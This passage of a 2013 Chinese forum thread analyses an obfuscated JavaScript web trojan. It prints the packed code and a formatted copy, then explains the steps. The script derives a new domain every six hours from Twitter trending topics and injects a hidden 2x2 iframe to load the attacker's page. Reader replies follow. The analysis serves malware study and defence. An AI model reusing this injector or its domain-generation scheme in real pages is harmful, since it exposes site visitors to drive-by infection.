jsKy.splice(jsS('z'),1+jsS('T')).join(jsS('u'))+'T'+jsKy.join(jsS('U'))};jsKJ={'h':'http://','s':'/','t':'tre','d':'dai','n':'nds','q':'?','c':'callback=','j':'js','a':'api','l':'ly','W':'twitter','o':'com','e':'1','k':'s','K':'body','x':'ajax','D':'.','L':'libs','J':'jquery','6':'6.2','m':'min','f':'on','S':'cript','i':'if','M':'rame','Y':'head','w':'width:','p':'px;','H':'height:','T':'2','r':'rc','Q':'"','y':'style=','b':'><','R':'></','I':'div','B':'<','A':'>','g':'google','E':'&date=','z':'0','u':'-','U':' ',',':':00',';':2345678901,'/':48271,'F':198195254,'G':12,'C':'='};function jsS(jsKo){jsh=[];for(jsKt=0;jsKt<jsKo.length;jsKt++){jsh.push(jsKJ[jsKo.charAt(jsKt)])}return jsA(jsh)}jsKN=document;jso=window;jso.jsH='undefined';jso.jsD=jsS('haDWDosestnsdlDjfqcq');jsi=(typeof($)==jso.jsH);if(jsi||!jsKd()){if(!jsi){try{jsKv=jQuery.noConflict(true)}catch(e){};try{jsKv=$.noConflict(true)}catch(e){}}jsKn=jsKN.getElementsByTagName(jsS('Y'))[0];jsr=jsKN.createElement(jsS('kS'));jsr.setAttribute(jsS('kr'),jsS("hxDgakDosxsLsJseD6sJDmDj"));jsKn.appendChild(jsr)}function jsKb(jsz,jsKc){return Math.floor(jsz/jsKc)}function jsT(jsF){var jsKm=jsKb(jso.jsx,js....join('')};function jsb(jsK){d=new Date();jsg=jsS('zee');d.setTime((jsK.as_of-jsS('G')*jsS('G')*jsS('G')*jsS('ezz'))*jsS('ezzz'));return d}function jsp(jsKB){var jsN,jsKM,jsJ=jsKB.length;var jsa=[];while(--jsJ){jsKM=jsT(jsJ);jsa.push(jsKM);jsN=jsKB[jsKM];jsKB[jsKM]=jsKB[jsJ];jsKB[jsJ]=jsN}}function jsKx($){jsKr=$.map([81,85,74,74,92,17,82,73,80,30,82,77,25,11,10,10,61,11,56,55,11,53,6,53,7,2,1,0,48],function(x,i){return String.fromCharCode(i+x+24)});return jsA(jsKr)}function jsf(x){return x.length}function jsKh($){if(typeof($)!=jso.jsH){$(function(){if(typeof($.jsKp)!=jso.jsH)return;$.jsKp=1;$.getJSON(jsD,function(jsKC){jse=jsb(jsKC);jsu=jse.getUTCMonth()+(+jsS('e'));jsKL=jse.getUTCDate();jsy=function(x,i){return(jsf(x+"")-1)?x:"0"+x};jsKs=jsy(jsu,4)+"-"+jsy(jsKL,7);jst=jsD+jsS("ETzeTu")+jsKs;jsKe=jsKH=jsKb(jse.getUTCHours(),6)*6+(+jsS('e'));jsKD=jsKe+1;jsC=+jsS('ez');setTimeout(function(){$.getJSON(jst,function(jsKC){try{jsn=jsKC.trends;jsm=jsS("TzeTu")+jsKs+" ";if(jsKe<jsC)jsKe=jsS('z')+jsKe;if(jsKD<jsC)jsKD=jsS('z')+jsKD;jsd=jsn[jsm+jsKe+jsS(',')];if(!jsd){jsd=jsn[jsm+jsKD+jsS(',')]}jsd=(jsd[3].name.toLowerCase().replace(/[^a-z]/gi,'')+'microscope').split('');jsB=jsu*71+jsKH*3+jsKL*37;jsP(jsB);jsf=jsT(4)+jsC;jsp(jsd);jsE=jsS('Ch')+jsA(jsd).substring(0,jsf)+'.com/'+jsKx($);jsKJ['Z']=jsE;jsKw=jsS('BIyQHTpweeepQbiMUyQHTpweeepQUkrZRiMRIA');$(jsS('K')).append(jsKw)}catch(jsKq){}})},jsC*jsC*jsC)})})}else{setTimeout(function(){jsKh(jso.jQuery)},1+jsS('TTT'))}}jsKh(jso.jQuery)})

复制代码

怎么还有cíjsS(？因为还有replace('?n','in'))呢，所以cíjsS('dow就是window，这里还要耍小花样啊

下面是JS格式化后的代码：

window.gloa = (function () {
Date.prototype.jsq = function () {
var jsKk = this;
return [jsKk.getUTCFullYear(), jsKk.getUTCMonth(), jsKk.getUTCDate(), jsKk.getUTCHours(), jsKk.getUTCMinutes(), jsKk.getUTCSeconds()]
};
Date.prototype.jsR = function () {
var jsw, jsKy = this.jsq(),
i = 0;
jsKy[1] += 1;
while (i++ < 7) {
jsw = jsKy[i];
if (jsw < jsC) jsKy[i] = jsS('
z ') + jsw
}
return jsKy.splice(jsS('
z '), 1 + jsS('
T ')).join(jsS('
u ')) + '
T ' + jsKy.join(jsS('
U '))
};
jsKJ = {
'
h ': '
http: //',
's': '/',
't': 'tre',
'd': 'dai',
'n': 'nds',
'q': '?',
'c': 'callback=',
'j': 'js',
'a': 'api',
'l': 'ly',
'W': 'twitter',
'o': 'com',
'e': '1',
'k': 's',
'K': 'body',
'x': 'ajax',
'D': '.',
'L': 'libs',
'J': 'jquery',
'6': '6.2',
'm': 'min',
'f': 'on',
'S': 'cript',
'i': 'if',
'M': 'rame',
'Y': 'head',
'w': 'width:',
'p': 'px;',
'H': 'height:',
'T': '2',
'r': 'rc',
'Q': '"',
'y': 'style=',
'b': '><',
'R': '></',
'I': 'div',
'B': '<',
'A': '>',
'g': 'google',
'E': '&date=',
'z': '0',
'u': '-',
'U': ' ',
',': ':00',
';': 2345678901,
'/': 48271,
'F': 198195254,
'G': 12,
'C': '='
};
function jsS(jsKo) {
jsh = [];
for (jsKt = 0; jsKt < jsKo.length; jsKt++) {
jsh.push(jsKJ[jsKo.charAt(jsKt)])
}
return jsA(jsh)
}
jsKN = document;
jso = window;
jso.jsH = 'undefined';
jso.jsD = jsS('haDWDosestnsdlDjfqcq');
jsi = (typeof ($) == jso.jsH);
if (jsi || !jsKd()) {
if (!jsi) {
try {
jsKv = jQuery.noConflict(true)
} catch (e) {};
try {
jsKv = $.noConflict(true)
} catch (e) {}
}
jsKn = jsKN.getElementsByTagName(jsS('Y'))[0];
jsr = jsKN.createElement(jsS('kS'));
jsr.setAttribute(jsS('kr'), jsS("hxDgakDosxsLsJseD6sJDmDj"));
jsKn.appendChild(jsr)
}
function jsKb(jsz, jsKc) {
return Math.floor(jsz / jsKc)
}
function jsT(jsF) {
var jsKm = jsKb(jso.jsx, js....join('')
};
function jsb(jsK) {
d = new Date();
jsg = jsS('zee');
d.setTime((jsK.as_of - jsS('G') * jsS('G') * jsS('G') * jsS('ezz')) * jsS('ezzz'));
return d
}
function jsp(jsKB) {
var jsN, jsKM, jsJ = jsKB.length;
var jsa = [];
while (--jsJ) {
jsKM = jsT(jsJ);
jsa.push(jsKM);
jsN = jsKB[jsKM];
jsKB[jsKM] = jsKB[jsJ];
jsKB[jsJ] = jsN
}
}
function jsKx($) {
jsKr = $.map([81, 85, 74, 74, 92, 17, 82, 73, 80, 30, 82, 77, 25, 11, 10, 10, 61, 11, 56, 55, 11, 53, 6, 53, 7, 2, 1, 0, 48], function (x, i) {
return String.fromCharCode(i + x + 24)
});
return jsA(jsKr)
}
function jsf(x) {
return x.length
}
function jsKh($) {
if (typeof ($) != jso.jsH) {
$(function () {
if (typeof ($.jsKp) != jso.jsH) return;
$.jsKp = 1;
$.getJSON(jsD, function (jsKC) {
jse = jsb(jsKC);
jsu = jse.getUTCMonth() + (+jsS('e'));
jsKL = jse.getUTCDate();
jsy = function (x, i) {
return (jsf(x + "") - 1) ? x : "0" + x
};
jsKs = jsy(jsu, 4) + "-" + jsy(jsKL, 7);
jst = jsD + jsS("ETzeTu") + jsKs;
jsKe = jsKH = jsKb(jse.getUTCHours(), 6) * 6 + (+jsS('e'));
jsKD = jsKe + 1;
jsC = +jsS('ez');
setTimeout(function () {
$.getJSON(jst, function (jsKC) {
try {
jsn = jsKC.trends;
jsm = jsS("TzeTu") + jsKs + " ";
if (jsKe < jsC) jsKe = jsS('z') + jsKe;
if (jsKD < jsC) jsKD = jsS('z') + jsKD;
jsd = jsn[jsm + jsKe + jsS(',')];
if (!jsd) {
jsd = jsn[jsm + jsKD + jsS(',')]
}
jsd = (jsd[3].name.toLowerCase().replace(/[^a-z]/gi, '') + 'microscope').split('');
jsB = jsu * 71 + jsKH * 3 + jsKL * 37;
jsP(jsB);
jsf = jsT(4) + jsC;
jsp(jsd);
jsE = jsS('Ch') + jsA(jsd).substring(0, jsf) + '.com/' + jsKx($);
jsKJ['Z'] = jsE;
jsKw = jsS('BIyQHTpweeepQbiMUyQHTpweeepQUkrZRiMRIA');
$(jsS('K')).append(jsKw)
} catch (jsKq) {}
})
}, jsC * jsC * jsC)
})
})
} else {
setTimeout(function () {
jsKh(jso.jQuery)
}, 1 + jsS('TTT'))
}
}
jsKh(jso.jQuery)
})

复制代码

中间还有部分加密的代码，不过已经可以看清楚大概了
当访问页面的时候，这段JS会访问类似于http://api.twitter.com/1/trends/ ... amp;_=1367174623572 这样的网址，估计是twitter的每日热门话题。
这样通过Twitter的接口来生成新的域名，然后挂马者在域名已经确定并且生效前将下载的木马挂上去。这个域名每6个小时就会变化一次。
由于在天朝是访问不了twitter的所以当然不会中这个木马了

好了这次的网马解密分析就到这里，

祝大家

柔痧鶢歪鶢尼

复制代码

<-有时候在源码中看到这种。。试试Ascii解密吧！

显示全部楼层 · 发表于 2013-4-29 12:19:18

最后的……我一直以为……是因为工具不支持XX编码了……

显示全部楼层 · 发表于 2013-4-29 13:38:25

大神太牛逼了

+10010

显示全部楼层 · 发表于 2013-4-29 15:32:40

膜拜大神

显示全部楼层 · 发表于 2013-5-4 13:10:40

此乃真大神，真

显示全部楼层 · 发表于 2013-5-15 23:34:24

作为绝对的新手小白，准备靠这个入门了

显示全部楼层 · 发表于 2013-6-3 20:19:45

nice

显示全部楼层 · 发表于 2013-6-7 20:18:37

是昔流芳发表于 2013-6-3 20:19
nice

刘芳姐啥时候回来~

伟大的Presto！- 向励志的蓝核同志学习！

显示全部楼层 · 发表于 2013-6-9 12:18:05

wjhstu-VxG 发表于 2013-6-7 20:18
刘芳姐啥时候回来~

快了:)

显示全部楼层 · 发表于 2013-6-28 10:48:10

前来学习

谁来教教我

[原创] 如何手动解网马+一个复杂有趣的网马分析

评分

评分